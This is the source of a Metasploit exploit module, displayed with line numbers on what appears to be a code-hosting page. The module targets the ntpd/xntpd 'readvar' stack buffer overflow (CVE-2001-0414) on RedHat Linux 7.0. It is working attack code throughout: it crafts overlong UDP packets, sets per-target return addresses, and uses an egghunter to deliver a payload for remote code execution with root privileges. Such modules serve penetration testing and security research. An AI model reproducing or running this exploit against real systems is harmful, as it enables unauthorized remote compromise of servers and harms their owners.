Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10
  include Msf::Exploit::Remote::Egghunter
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'NTP Daemon readvar Buffer Overflow',
15
      'Description'    => %q{
16
        This module exploits a stack based buffer overflow in the
17
        ntpd and xntpd service. By sending an overly long 'readvar'
18
        request it is possible to execute code remotely. As the stack
19
        is corrupted, this module uses the Egghunter technique.
20
      },
21
      'Author'         => 'aushack',
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
            [ 'CVE', '2001-0414' ],
26
            [ 'OSVDB', '805' ],
27
            [ 'BID', '2540' ],
28
            [ 'US-CERT-VU', '970472' ],
29
        ],
30
      'Payload'        =>
31
        {
32
          'Space'    => 220,
33
          'BadChars' => "\x00\x01\x02\x16,=",
34
          'StackAdjustment' => -3500,
35
          'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
36
          'Compat'   =>
37
          {
38
            'ConnectionType' => '-reverse',
39
          },
40
        },
41
      'Platform'       => [ 'linux' ],
42
      'Arch'		 => [ ARCH_X86 ],
43
      'Targets'        =>
44
        [
45
            [ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
46
            [ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
47
            [ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
48
            #[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
49
            [ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
50
        ],
51
      'Privileged'     => true,
52
      'DisclosureDate' => '2001-04-04',
53
      'DefaultTarget' => 0))
54

55
    register_options([Opt::RPORT(123)])
56
  end
57

58
  def exploit
59

60
    hunter  = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
61
    egg     = hunter[1]
62

63
    connect_udp
64

65
    pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
66
    pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
67

68
    sploit =  pkt1 + make_nops(512 - pkt1.length)
69
    sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
70
    sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]
71

72
    print_status("Trying target #{target.name}...")
73

74
    print_status("Sending hunter")
75
    udp_sock.put(sploit)
76
    select(nil,nil,nil,0.5)
77

78
    print_status("Sending payload")
79
    udp_sock.put(pkt1 + egg)
80
    select(nil,nil,nil,0.5)
81

82
    print_status("Calling overflow trigger")
83
    udp_sock.put(pkt2)
84
    select(nil,nil,nil,0.5)
85

86
    handler
87
    disconnect_udp
88

89
  end
90
end
91

92